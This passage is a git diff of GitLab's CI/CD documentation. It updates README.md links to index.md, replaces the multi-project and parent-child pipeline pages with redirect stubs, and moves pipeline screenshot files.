to configure anything to have these appear. -If they aren't working as expected, or if you'd like to see what's available, our [CI feature index](../README.md#feature-set) has the full list +If they aren't working as expected, or if you'd like to see what's available, our [CI feature index](../index.md#feature-set) has the full list of bundled features and links to the documentation for each. ### Templates @@ -227,14 +227,14 @@ and is meant to be a mapping of concepts there to concepts in GitLab. #### `agent` -The agent section is used to define how a pipeline executes. For GitLab, we use [runners](../runners/README.md) +The agent section is used to define how a pipeline executes. For GitLab, we use [runners](../runners/index.md) to provide this capability. You can configure your own runners in Kubernetes or on any host, or take advantage of our shared runner fleet (note that the shared runner fleet is only available for GitLab.com users). We also support using [tags](../runners/configure_runners.md#use-tags-to-limit-the-number-of-jobs-using-the-runner) to direct different jobs to different runners (execution agents). The `agent` section also allows you to define which Docker images should be used for execution, for which we use -the [`image`](../yaml/README.md#image) keyword. The `image` can be set on a single job or at the top level, in which +the [`image`](../yaml/index.md#image) keyword. The `image` can be set on a single job or at the top level, in which case it applies to all jobs in the pipeline: ```yaml @@ -258,7 +258,7 @@ stages: ``` Setting a step to be performed before and after any job can be done via the -[`before_script`](../yaml/README.md#before_script) and [`after_script`](../yaml/README.md#after_script) keywords: +[`before_script`](../yaml/index.md#before_script) and [`after_script`](../yaml/index.md#after_script) keywords: ```yaml default: @@ -268,10 +268,10 @@ default: #### `stages` -GitLab CI/CD also lets you define stages, but is a little bit more free-form to configure. The GitLab [`stages` keyword](../yaml/README.md#stages) +GitLab CI/CD also lets you define stages, but is a little bit more free-form to configure. The GitLab [`stages` keyword](../yaml/index.md#stages) is a top level setting that enumerates the list of stages, but you are not required to nest individual jobs underneath the `stages` section. Any job defined in the `.gitlab-ci.yml` can be made a part of any stage through use of the -[`stage:` keyword](../yaml/README.md#stage). +[`stage:` keyword](../yaml/index.md#stage). Note that, unless otherwise specified, every pipeline is instantiated with a `build`, `test`, and `deploy` stage which are run in that order. Jobs that have no `stage` defined are placed by default in the `test` stage. @@ -289,7 +289,7 @@ my_job: #### `steps` -The `steps` section is equivalent to the [`script` section](../yaml/README.md#script) of an individual job. This is +The `steps` section is equivalent to the [`script` section](../yaml/index.md#script) of an individual job. This is a simple YAML array with each line representing an individual command to be run: ```yaml @@ -303,9 +303,9 @@ my_job: #### `environment` -In GitLab, we use the [`variables` keyword](../yaml/README.md#variables) to define different variables at runtime. -These can also be set up through the GitLab UI, under CI/CD settings. See also our [general documentation on variables](../variables/README.md), -including the section on [protected variables](../variables/README.md#protect-a-cicd-variable) which can be used +In GitLab, we use the [`variables` keyword](../yaml/index.md#variables) to define different variables at runtime. +These can also be set up through the GitLab UI, under CI/CD settings. See also our [general documentation on variables](../variables/index.md), +including the section on [protected variables](../variables/index.md#protect-a-cicd-variable) which can be used to limit access to certain variables to certain environments or runners: ```yaml @@ -318,7 +318,7 @@ variables: Here, options for different things exist associated with the object in question itself. For example, options related to jobs are defined in relation to the job itself. If you're looking for a certain option, you should be able to find -where it's located by searching our [complete configuration reference](../yaml/README.md) page. +where it's located by searching our [complete configuration reference](../yaml/index.md) page. #### `parameters` @@ -347,9 +347,9 @@ variable entry. #### `when` -GitLab does support a [`when` keyword](../yaml/README.md#when) which is used to indicate when a job should be +GitLab does support a [`when` keyword](../yaml/index.md#when) which is used to indicate when a job should be run in case of (or despite) failure, but most of the logic for controlling pipelines can be found in -our very powerful [`rules` system](../yaml/README.md#rules): +our very powerful [`rules` system](../yaml/index.md#rules): ```yaml my_job: diff --git a/doc/ci/multi_project_pipelines.md b/doc/ci/multi_project_pipelines.md index acdbe0455ba..06cbf63e512 100644 --- a/doc/ci/multi_project_pipelines.md +++ b/doc/ci/multi_project_pipelines.md @@ -1,332 +1,8 @@ --- -stage: Verify -group: Pipeline Authoring -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -type: reference +redirect_to: 'pipelines/multi_project_pipelines.md' --- -# Multi-project pipelines **(FREE)** +This document was moved to [another location](pipelines/multi_project_pipelines.md). -> [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/199224) to GitLab Free in 12.8. - -You can set up [GitLab CI/CD](README.md) across multiple projects, so that a pipeline -in one project can trigger a pipeline in another project. - -<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> -For an overview see the [Multi-project pipelines demo](https://www.youtube.com/watch?v=g_PIwBM1J84). - -GitLab CI/CD is a powerful continuous integration tool that works not only per project, -but also across projects with multi-project pipelines. - -Multi-project pipelines are useful for larger products that require cross-project inter-dependencies, such as those -adopting a [microservices architecture](https://about.gitlab.com/blog/2016/08/16/trends-in-version-control-land-microservices/). - -Cross-functional development teams can use cross-pipeline -triggering to trigger multiple pipelines for different microservices projects. Learn more -in the [Cross-project Pipeline Triggering and Visualization demo](https://about.gitlab.com/learn/) -at GitLab@learn, in the Continuous Integration (CI) section. - -Additionally, it's possible to visualize the entire pipeline, including all cross-project -inter-dependencies. **(PREMIUM)** - -## Use cases - -Let's assume you deploy your web app from different projects in GitLab: - -- One for the free version, which has its own pipeline that builds and tests your app -- One for the paid version add-ons, which also pass through builds and tests -- One for the documentation, which also builds, tests, and deploys with an SSG - -With Multi-Project Pipelines you can visualize the entire pipeline, including all build and test stages for the three projects. - -## Multi-project pipeline visualization **(PREMIUM)** - -When you configure GitLab CI/CD for your project, you can visualize the stages of your -[jobs](pipelines/index.md#configure-a-pipeline) on a [pipeline graph](pipelines/index.md#visualize-pipelines). - - - -In the Merge Request Widget, multi-project pipeline mini-graphs are displayed, -and when hovering or tapping (on touchscreen devices) they expand and are shown adjacent to each other. - - - -## Triggering multi-project pipelines through API - -> [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/31573) to GitLab Free in 12.4. - -When you use the [`CI_JOB_TOKEN` to trigger pipelines](triggers/README.md#ci-job-token), GitLab -recognizes the source of the job token, and thus internally ties these pipelines -together, allowing you to visualize their relationships on pipeline graphs. - -These relationships are displayed in the pipeline graph by showing inbound and -outbound connections for upstream and downstream pipeline dependencies. - -When using: - -- CI/CD Variables or [`rules`](yaml/README.md#rulesif) to control job behavior, the value of - the [`$CI_PIPELINE_SOURCE` predefined variable](variables/predefined_variables.md) is - `pipeline` for multi-project pipeline triggered through the API with `CI_JOB_TOKEN`. -- [`only/except`](yaml/README.md#only--except) to control job behavior, use the - `pipelines` keyword. - -## Creating multi-project pipelines from `.gitlab-ci.yml` - -> [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/199224) to GitLab Free in 12.8. - -### Triggering a downstream pipeline using a bridge job - -Before GitLab 11.8, it was necessary to implement a pipeline job that was -responsible for making the API request [to trigger a pipeline](#triggering-multi-project-pipelines-through-api) -in a different project. - -In GitLab 11.8, GitLab provides a new CI/CD configuration syntax to make this -task easier, and avoid needing GitLab Runner for triggering cross-project -pipelines. The following illustrates configuring a bridge job: - -```yaml -rspec: - stage: test - script: bundle exec rspec - -staging: - variables: - ENVIRONMENT: staging - stage: deploy - trigger: my/deployment -``` - -In the example above, as soon as the `rspec` job succeeds in the `test` stage, -the `staging` bridge job is started. The initial status of this -job is `pending`. GitLab then creates a downstream pipeline in the -`my/deployment` project and, as soon as the pipeline is created, the -`staging` job succeeds. `my/deployment` is a full path to that project. - -The user that created the upstream pipeline needs to have access rights to the -downstream project (`my/deployment` in this case). If a downstream project is -not found, or a user does not have access rights to create a pipeline there, -the `staging` job is marked as _failed_. - -When using: - -- CI/CD variables or [`rules`](yaml/README.md#rulesif) to control job behavior, the value of - the [`$CI_PIPELINE_SOURCE` predefined variable](variables/predefined_variables.md) is - `pipeline` for multi-project pipelines triggered with a bridge job (using the - [`trigger:`](yaml/README.md#trigger) keyword). -- [`only/except`](yaml/README.md#only--except) to control job behavior, use the - `pipelines` keyword. - -In the example, `staging` is marked as successful as soon as a downstream pipeline -gets created. If you want to display the downstream pipeline's status instead, see -[Mirroring status from triggered pipeline](#mirroring-status-from-triggered-pipeline). - -NOTE: -Bridge jobs [do not support every configuration keyword](#limitations) that can be used -with other jobs. If a user tries to use unsupported configuration keywords, YAML -validation fails on pipeline creation. - -### Specifying a downstream pipeline branch - -It is possible to specify a branch name that a downstream pipeline uses: - -```yaml -rspec: - stage: test - script: bundle exec rspec - -staging: - stage: deploy - trigger: - project: my/deployment - branch: stable-11-2 -``` - -Use: - -- The `project` keyword to specify the full path to a downstream project. -- The `branch` keyword to specify the name of a branch in the project specified by `project`. - [From GitLab 12.4](https://gitlab.com/gitlab-org/gitlab/-/issues/10126), variable expansion is - supported. - -GitLab uses a commit that is on the head of the branch when -creating a downstream pipeline. - -NOTE: -Pipelines triggered on a protected branch in a downstream project use the [permissions](../user/permissions.md) -of the user that ran the trigger job in the upstream project. If the user does not -have permission to run CI/CD pipelines against the protected branch, the pipeline fails. See -[pipeline security for protected branches](pipelines/index.md#pipeline-security-on-protected-branches). - -### Passing CI/CD variables to a downstream pipeline - -#### With the `variables` keyword - -Sometimes you might want to pass CI/CD variables to a downstream pipeline. -You can do that using the `variables` keyword, just like you would when -defining a regular job. - -```yaml -rspec: - stage: test - script: bundle exec rspec - -staging: - variables: - ENVIRONMENT: staging - stage: deploy - trigger: my/deployment -``` - -The `ENVIRONMENT` variable is passed to every job defined in a downstream -pipeline. It is available as a variable when GitLab Runner picks a job. - -In the following configuration, the `MY_VARIABLE` variable is passed to the downstream pipeline -that is created when the `trigger-downstream` job is queued. This is because `trigger-downstream` -job inherits variables declared in global variables blocks, and then we pass these variables to a downstream pipeline. - -```yaml -variables: - MY_VARIABLE: my-value - -trigger-downstream: - variables: - ENVIRONMENT: something - trigger: my/project -``` - -You might want to pass some information about the upstream pipeline using, for -example, predefined variables. In order to do that, you can use interpolation -to pass any variable. For example: - -```yaml -downstream-job: - variables: - UPSTREAM_BRANCH: $CI_COMMIT_REF_NAME - trigger: my/project -``` - -In this scenario, the `UPSTREAM_BRANCH` variable with a value related to the -upstream pipeline is passed to the `downstream-job` job, and is available -within the context of all downstream builds. - -Upstream pipelines take precedence over downstream ones. If there are two -variables with the same name defined in both upstream and downstream projects, -the ones defined in the upstream project take precedence. - -#### With variable inheritance - -You can pass variables to a downstream pipeline with [`dotenv` variable inheritance](variables/README.md#pass-an-environment-variable-to-another-job) and [cross project artifact downloads](yaml/README.md#cross-project-artifact-downloads-with-needs). - -In the upstream pipeline: - -1. Save the variables in a `.env` file. -1. Save the `.env` file as a `dotenv` report. -1. Trigger the downstream pipeline. - -```yaml -build_vars: - stage: build - script: - - echo "BUILD_VERSION=hello" >> build.env - artifacts: - reports: - dotenv: build.env - -deploy: - stage: deploy - trigger: my/downstream_project -``` - -Set the `test` job in the downstream pipeline to inherit the variables from the `build_vars` -job in the upstream project with `needs:`. The `test` job inherits the variables in the -`dotenv` report and it can access `BUILD_VERSION` in the script: - -```yaml -test: - stage: test - script: - - echo $BUILD_VERSION - needs: - - project: my/upstream_project - job: build_vars - ref: master - artifacts: true -``` - -### Mirroring status from triggered pipeline - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/11238) in GitLab Premium 12.3. -> - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/199224) to GitLab Free in 12.8. - -You can mirror the pipeline status from the triggered pipeline to the source -bridge job by using `strategy: depend`. For example: - -```yaml -trigger_job: - trigger: - project: my/project - strategy: depend -``` - -### Mirroring status from upstream pipeline - -You can mirror the pipeline status from an upstream pipeline to a bridge job by -using the `needs:pipeline` keyword. The latest pipeline status from the default branch is -replicated to the bridge job. - -Example: - -```yaml -upstream_bridge: - stage: test - needs: - pipeline: other/project -``` - -### Limitations - -Bridge jobs are a little different from regular jobs. It is not -possible to use exactly the same configuration syntax as when defining regular jobs -that are picked by a runner. - -Some features are not implemented yet. For example, support for environments. - -[Configuration keywords](yaml/README.md) available for bridge jobs are: - -- `trigger` (to define a downstream pipeline trigger) -- `stage` -- `allow_failure` -- [`rules`](yaml/README.md#rules) -- `only` and `except` -- `when` (only with `on_success`, `on_failure`, and `always` values) -- `extends` -- `needs` - -## Trigger a pipeline when an upstream project is rebuilt **(PREMIUM)** - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/9045) in GitLab Premium 12.8. - -You can trigger a pipeline in your project whenever a pipeline finishes for a new -tag in a different project: - -1. Go to the project's **Settings > CI/CD** page, and expand the **Pipeline subscriptions** section. -1. Enter the project you want to subscribe to, in the format `<namespace>/<project>`. - For example, if the project is `https://gitlab.com/gitlab-org/gitlab`, use `gitlab-org/gitlab`. -1. Click subscribe. - -Any pipelines that complete successfully for new tags in the subscribed project -now trigger a pipeline on the current project's default branch. The maximum -number of upstream pipeline subscriptions is 2 by default, for both the upstream and -downstream projects. This [application limit](../administration/instance_limits.md#number-of-cicd-subscriptions-to-a-project) can be changed on self-managed instances by a GitLab administrator. - -The upstream project needs to be [public](../public_access/public_access.md) -and the user must have [developer permissions](../user/permissions.md#project-members-permissions) -for the upstream project. - -## Downstream private projects confidentiality concern - -If you trigger a pipeline in a downstream private project, the name of the project -and the status of the pipeline is visible in the upstream project's pipelines page. - -If you have a public project that can trigger downstream pipelines in a private -project, make sure to check that there are no confidentiality problems. +<!-- This redirect file can be deleted after 2021-09-29. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/parent_child_pipelines.md b/doc/ci/parent_child_pipelines.md index 82bac7c51d2..0b8df2e9f4c 100644 --- a/doc/ci/parent_child_pipelines.md +++ b/doc/ci/parent_child_pipelines.md @@ -1,189 +1,8 @@ --- -stage: Verify -group: Pipeline Execution -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -type: reference +redirect_to: 'pipelines/parent_child_pipelines.md' --- -# Parent-child pipelines +This document was moved to [another location](pipelines/parent_child_pipelines.md). -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/16094) in GitLab 12.7. - -As pipelines grow more complex, a few related problems start to emerge: - -- The staged structure, where all steps in a stage must be completed before the first - job in next stage begins, causes arbitrary waits, slowing things down. -- Configuration for the single global pipeline becomes very long and complicated, - making it hard to manage. -- Imports with [`include`](yaml/README.md#include) increase the complexity of the configuration, and create the potential - for namespace collisions where jobs are unintentionally duplicated. -- Pipeline UX can become unwieldy with so many jobs and stages to work with. - -Additionally, sometimes the behavior of a pipeline needs to be more dynamic. The ability -to choose to start sub-pipelines (or not) is a powerful ability, especially if the -YAML is dynamically generated. - - - -Similarly to [multi-project pipelines](multi_project_pipelines.md), a pipeline can trigger a -set of concurrently running child pipelines, but within the same project: - -- Child pipelines still execute each of their jobs according to a stage sequence, but - would be free to continue forward through their stages without waiting for unrelated - jobs in the parent pipeline to finish. -- The configuration is split up into smaller child pipeline configurations, which are - easier to understand. This reduces the cognitive load to understand the overall configuration. -- Imports are done at the child pipeline level, reducing the likelihood of collisions. -- Each pipeline has only relevant steps, making it easier to understand what's going on. - -Child pipelines work well with other GitLab CI/CD features: - -- Use [`rules: changes`](yaml/README.md#ruleschanges) to trigger pipelines only when - certain files change. This is useful for monorepos, for example. -- Since the parent pipeline in `.gitlab-ci.yml` and the child pipeline run as normal - pipelines, they can have their own behaviors and sequencing in relation to triggers. - -See the [`trigger:`](yaml/README.md#trigger) keyword documentation for full details on how to -include the child pipeline configuration. - -<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> -For an overview, see [Parent-Child Pipelines feature demo](https://youtu.be/n8KpBSqZNbk). - -## Examples - -The simplest case is [triggering a child pipeline](yaml/README.md#trigger) using a -local YAML file to define the pipeline configuration. In this case, the parent pipeline -triggers the child pipeline, and continues without waiting: - -```yaml -microservice_a: - trigger: - include: path/to/microservice_a.yml -``` - -You can include multiple files when composing a child pipeline: - -```yaml -microservice_a: - trigger: - include: - - local: path/to/microservice_a.yml - - template: Security/SAST.gitlab-ci.yml -``` - -In [GitLab 13.5](https://gitlab.com/gitlab-org/gitlab/-/issues/205157) and later, -you can use [`include:file`](yaml/README.md#includefile) to trigger child pipelines -with a configuration file in a different project: - -```yaml -microservice_a: - trigger: - include: - - project: 'my-group/my-pipeline-library' - file: 'path/to/ci-config.yml' -``` - -The maximum number of entries that are accepted for `trigger:include:` is three. - -Similar to [multi-project pipelines](multi_project_pipelines.md#mirroring-status-from-triggered-pipeline), -we can set the parent pipeline to depend on the status of the child pipeline upon completion: - -```yaml -microservice_a: - trigger: - include: - - local: path/to/microservice_a.yml - - template: Security/SAST.gitlab-ci.yml - strategy: depend -``` - -## Merge Request child pipelines - -To trigger a child pipeline as a [Merge Request Pipeline](merge_request_pipelines/index.md) we need to: - -- Set the trigger job to run on merge requests: - -```yaml -# parent .gitlab-ci.yml -microservice_a: - trigger: - include: path/to/microservice_a.yml - rules: - - if: $CI_MERGE_REQUEST_ID -``` - -- Configure the child pipeline by either: - - - Setting all jobs in the child pipeline to evaluate in the context of a merge request: - - ```yaml - # child path/to/microservice_a.yml - workflow: - rules: - - if: $CI_MERGE_REQUEST_ID - - job1: - script: ... - - job2: - script: ... - ``` - - - Alternatively, setting the rule per job. For example, to create only `job1` in - the context of merge request pipelines: - - ```yaml - # child path/to/microservice_a.yml - job1: - script: ... - rules: - - if: $CI_MERGE_REQUEST_ID - - job2: - script: ... - ``` - -## Dynamic child pipelines - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/35632) in GitLab 12.9. - -Instead of running a child pipeline from a static YAML file, you can define a job that runs -your own script to generate a YAML file, which is then [used to trigger a child pipeline](yaml/README.md#trigger-child-pipeline-with-generated-configuration-file). - -This technique can be very powerful in generating pipelines targeting content that changed or to -build a matrix of targets and architectures. - -<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> -For an overview, see [Create child pipelines using dynamically generated configurations](https://youtu.be/nMdfus2JWHM). - -<!-- vale gitlab.Spelling = NO --> -We also have an example project using -[Dynamic Child Pipelines with Jsonnet](https://gitlab.com/gitlab-org/project-templates/jsonnet) -which shows how to use a data templating language to generate your `.gitlab-ci.yml` at runtime. You could use a similar process for other templating languages like [Dhall](https://dhall-lang.org/) or [`ytt`](https://get-ytt.io/). -<!-- vale gitlab.Spelling = NO --> - -The artifact path is parsed by GitLab, not the runner, so the path must match the -syntax for the OS running GitLab. If GitLab is running on Linux but using a Windows -runner for testing, the path separator for the trigger job would be `/`. Other CI/CD -configuration for jobs, like scripts, that use the Windows runner would use `\`. - -In GitLab 12.9, the child pipeline could fail to be created in certain cases, causing the parent pipeline to fail. -This is [resolved in GitLab 12.10](https://gitlab.com/gitlab-org/gitlab/-/issues/209070). - -## Nested child pipelines - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/29651) in GitLab 13.4. -> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/243747) in GitLab 13.5. - -Parent and child pipelines were introduced with a maximum depth of one level of child -pipelines, which was later increased to two. A parent pipeline can trigger many child -pipelines, and these child pipelines can trigger their own child pipelines. It's not -possible to trigger another level of child pipelines. - -<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> -For an overview, see [Nested Dynamic Pipelines](https://youtu.be/C5j3ju9je2M). - -## Pass CI/CD variables to a child pipeline - -You can [pass CI/CD variables to a downstream pipeline](multi_project_pipelines.md#passing-cicd-variables-to-a-downstream-pipeline) -the same way as for multi-project pipelines. +<!-- This redirect file can be deleted after 2021-09-29. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/pipeline_editor/index.md b/doc/ci/pipeline_editor/index.md index 1527a05d3d7..7132d47d324 100644 --- a/doc/ci/pipeline_editor/index.md +++ b/doc/ci/pipeline_editor/index.md @@ -15,10 +15,10 @@ the `.gitlab-ci.yml` file in the root of your repository. To access the editor, From the pipeline editor page you can: -- Select the branch to work from. [Introduced in GitLab 13.12](https://gitlab.com/gitlab-org/gitlab/-/issues/326189), disabled by default. +- Select the branch to work from. - [Validate](#validate-ci-configuration) your configuration syntax while editing the file. - Do a deeper [lint](#lint-ci-configuration) of your configuration, that verifies it with any configuration - added with the [`include`](../yaml/README.md#include) keyword. + added with the [`include`](../yaml/index.md#include) keyword. - See a [visualization](#visualize-ci-configuration) of the current configuration. - View an [expanded](#view-expanded-configuration) version of your configuration. - [Commit](#commit-changes-to-ci-configuration) the changes to a specific branch. @@ -58,7 +58,7 @@ reflected in the CI lint. It displays the same results as the existing [CI Lint To view a visualization of your `gitlab-ci.yml` configuration, in your project, go to **CI/CD > Editor**, and then select the **Visualize** tab. The -visualization shows all stages and jobs. Any [`needs`](../yaml/README.md#needs) +visualization shows all stages and jobs. Any [`needs`](../yaml/index.md#needs) relationships are displayed as lines connecting jobs together, showing the hierarchy of execution: @@ -80,10 +80,10 @@ To view the fully expanded CI/CD configuration as one combined file, go to the pipeline editor's **View merged YAML** tab. This tab displays an expanded configuration where: -- Configuration imported with [`include`](../yaml/README.md#include) is copied into the view. -- Jobs that use [`extends`](../yaml/README.md#extends) display with the - [extended configuration merged into the job](../yaml/README.md#merge-details). -- YAML anchors are [replaced with the linked configuration](../yaml/README.md#anchors). +- Configuration imported with [`include`](../yaml/index.md#include) is copied into the view. +- Jobs that use [`extends`](../yaml/index.md#extends) display with the + [extended configuration merged into the job](../yaml/index.md#merge-details). +- YAML anchors are [replaced with the linked configuration](../yaml/index.md#anchors). ## Commit changes to CI configuration diff --git a/doc/ci/pipelines/img/coverage_check_approval_rule_14_1.png b/doc/ci/pipelines/img/coverage_check_approval_rule_14_1.png Binary files differnew file mode 100644 index 00000000000..00eb5c84ca9 --- /dev/null +++ b/doc/ci/pipelines/img/coverage_check_approval_rule_14_1.png diff --git a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/img/merge_train_cancel_v12_0.png b/doc/ci/pipelines/img/merge_train_cancel_v12_0.png Binary files differindex d7720ac1143..d7720ac1143 100644 --- a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/img/merge_train_cancel_v12_0.png +++ b/doc/ci/pipelines/img/merge_train_cancel_v12_0.png diff --git a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/img/merge_train_failure.png b/doc/ci/pipelines/img/merge_train_failure.png Binary files differindex 8a795fff432..8a795fff432 100644 --- a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/img/merge_train_failure.png +++ b/doc/ci/pipelines/img/merge_train_failure.png diff --git a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/img/merge_train_immediate_merge_v12_6.png b/doc/ci/pipelines/img/merge_train_immediate_merge_v12_6.png Binary files differindex 7b903716a3d..7b903716a3d 100644 --- a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/img/merge_train_immediate_merge_v12_6.png +++ b/doc/ci/pipelines/img/merge_train_immediate_merge_v12_6.png diff --git a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/img/merge_train_position_v12_0.png b/doc/ci/pipelines/img/merge_train_position_v12_0.png Binary files differindex ec4b157d428..ec4b157d428 100644 --- a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/img/merge_train_position_v12_0.png +++ b/doc/ci/pipelines/img/merge_train_position_v12_0.png diff --git a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/img/merge_train_start_v12_0.png b/doc/ci/pipelines/img/merge_train_start_v12_0.png Binary files differindex a4d0c8cf0e6..a4d0c8cf0e6 100644 --- a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/img/merge_train_start_v12_0.png +++ b/doc/ci/pipelines/img/merge_train_start_v12_0.png diff --git a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/img/merge_train_start_when_pipeline_succeeds_v12_0.png b/doc/ci/pipelines/img/merge_train_start_when_pipeline_succeeds_v12_0.png Binary files differindex 45762b8e85e..45762b8e85e 100644 --- a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/img/merge_train_start_when_pipeline_succeeds_v12_0.png +++ b/doc/ci/pipelines/img/merge_train_start_when_pipeline_succeeds_v12_0.png diff --git a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/img/merged_result_pipeline.png b/doc/ci/pipelines/img/merged_result_pipeline.png Binary files differindex 2584cd4d38d..2584cd4d38d 100644 --- a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/img/merged_result_pipeline.png +++ b/doc/ci/pipelines/img/merged_result_pipeline.png diff --git a/doc/ci/img/multi_pipeline_mini_graph.gif b/doc/ci/pipelines/img/multi_pipeline_mini_graph.gif Binary files differindex de49ba5aa12..de49ba5aa12 100644 --- a/doc/ci/img/multi_pipeline_mini_graph.gif +++ b/doc/ci/pipelines/img/multi_pipeline_mini_graph.gif diff --git a/doc/ci/img/multi_project_pipeline_graph.png b/doc/ci/pipelines/img/multi_project_pipeline_graph.png Binary files differindex 723a455cb4a..723a455cb4a 100644 --- a/doc/ci/img/multi_project_pipeline_graph.png +++ b/doc/ci/pipelines/img/multi_project_pipeline_graph.png diff --git a/doc/ci/img/parent_pipeline_graph_expanded_v12_6.png b/doc/ci/pipelines/img/parent_pipeline_graph_expanded_v12_6.png Binary files differindex db18cc201fc..db18cc201fc 100644 --- a/doc/ci/img/parent_pipeline_graph_expanded_v12_6.png +++ b/doc/ci/pipelines/img/parent_pipeline_graph_expanded_v12_6.png diff --git a/doc/ci/merge_request_pipelines/img/pipeline-fork_v13_7.png b/doc/ci/pipelines/img/pipeline-fork_v13_7.png Binary files differindex eb44290aa66..eb44290aa66 100644 --- a/doc/ci/merge_request_pipelines/img/pipeline-fork_v13_7.png +++ b/doc/ci/pipelines/img/pipeline-fork_v13_7.png diff --git a/doc/ci/pipelines/img/pipelines_graph_dependency_view_hover_v13_12.png b/doc/ci/pipelines/img/pipelines_graph_dependency_view_hover_v13_12.png Binary files differindex e73845b39b0..ff6b3af0a28 100644 --- a/doc/ci/pipelines/img/pipelines_graph_dependency_view_hover_v13_12.png +++ b/doc/ci/pipelines/img/pipelines_graph_dependency_view_hover_v13_12.png diff --git a/doc/ci/pipelines/img/pipelines_graph_dependency_view_links_v13_12.png b/doc/ci/pipelines/img/pipelines_graph_dependency_view_links_v13_12.png Binary files differindex 1ce77881bc4..b0923ab96d9 100644 --- a/doc/ci/pipelines/img/pipelines_graph_dependency_view_links_v13_12.png +++ b/doc/ci/pipelines/img/pipelines_graph_dependency_view_links_v13_12.png diff --git a/doc/ci/pipelines/img/pipelines_graph_dependency_view_v13_12.png b/doc/ci/pipelines/img/pipelines_graph_dependency_view_v13_12.png Binary files differindex 41840108441..ae7cdc5b43e 100644 --- a/doc/ci/pipelines/img/pipelines_graph_dependency_view_v13_12.png +++ b/doc/ci/pipelines/img/pipelines_graph_dependency_view_v13_12.png diff --git a/doc/ci/pipelines/img/pipelines_graph_stage_view_v13_12.png b/doc/ci/pipelines/img/pipelines_graph_stage_view_v13_12.png Binary files differindex d7d8f3c63d2..b3b98313350 100644 --- a/doc/ci/pipelines/img/pipelines_graph_stage_view_v13_12.png +++ b/doc/ci/pipelines/img/pipelines_graph_stage_view_v13_12.png diff --git a/doc/ci/pipelines/index.md b/doc/ci/pipelines/index.md index af6b9e5b6b3..4f818d658b7 100644 --- a/doc/ci/pipelines/index.md +++ b/doc/ci/pipelines/index.md @@ -20,7 +20,7 @@ Pipelines comprise: - Jobs, which define *what* to do. For example, jobs that compile or test code. - Stages, which define *when* to run the jobs. For example, stages that run tests after stages that compile the code. -Jobs are executed by [runners](../runners/README.md). Multiple jobs in the same stage are executed in parallel, +Jobs are executed by [runners](../runners/index.md). Multiple jobs in the same stage are executed in parallel, if there are enough concurrent runners. If *all* jobs in a stage succeed, the pipeline moves on to the next stage. @@ -38,7 +38,7 @@ A typical pipeline might consist of four stages, executed in the following order - A `production` stage, with a job called `deploy-to-prod`. NOTE: -If you have a [mirrored repository that GitLab pulls from](../../user/project/repository/repository_mirroring.md#pulling-from-a-remote-repository), +If you have a [mirrored repository that GitLab pulls from](../../user/project/repository/repository_mirroring.md#pull-from-a-remote-repository), you may need to enable pipeline triggering in your project's **Settings > Repository > Pull from a remote repository > Trigger pipelines for mirror updates**. @@ -50,16 +50,16 @@ Pipelines can be configured in many different ways: followed by the next stage. - [Directed Acyclic Graph Pipeline (DAG) pipelines](../directed_acyclic_graph/index.md) are based on relationships between jobs and can run more quickly than basic pipelines. -- [Multi-project pipelines](../multi_project_pipelines.md) combine pipelines for different projects together. -- [Parent-Child pipelines](../parent_child_pipelines.md) break down complex pipelines +- [Multi-project pipelines](multi_project_pipelines.md) combine pipelines for different projects together. +- [Parent-Child pipelines](parent_child_pipelines.md) break down complex pipelines into one parent pipeline that can trigger multiple child sub-pipelines, which all run in the same project and with the same SHA. -- [Pipelines for Merge Requests](../merge_request_pipelines/index.md) run for merge +- [Pipelines for Merge Requests](../pipelines/merge_request_pipelines.md) run for merge requests only (rather than for every commit). -- [Pipelines for Merged Results](../merge_request_pipelines/pipelines_for_merged_results/index.md) +- [Pipelines for Merged Results](../pipelines/pipelines_for_merged_results.md) are merge request pipelines that act as though the changes from the source branch have already been merged into the target branch. -- [Merge Trains](../merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md) +- [Merge Trains](../pipelines/merge_trains.md) use pipelines for merged results to queue merges one after the other. ## Configure a pipeline @@ -67,15 +67,15 @@ Pipelines can be configured in many different ways: Pipelines and their component jobs and stages are defined in the CI/CD pipeline configuration file for each project. - [Jobs](../jobs/index.md) are the basic configuration component. -- Stages are defined by using the [`stages`](../yaml/README.md#stages) keyword. +- Stages are defined by using the [`stages`](../yaml/index.md#stages) keyword. -For a list of configuration options in the CI pipeline file, see the [GitLab CI/CD Pipeline Configuration Reference](../yaml/README.md). +For a list of configuration options in the CI pipeline file, see the [GitLab CI/CD Pipeline 